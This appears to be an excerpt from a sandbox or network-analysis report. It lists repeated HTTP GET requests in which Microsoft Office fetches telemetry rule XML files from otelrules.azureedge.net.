Source: global traffic HTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
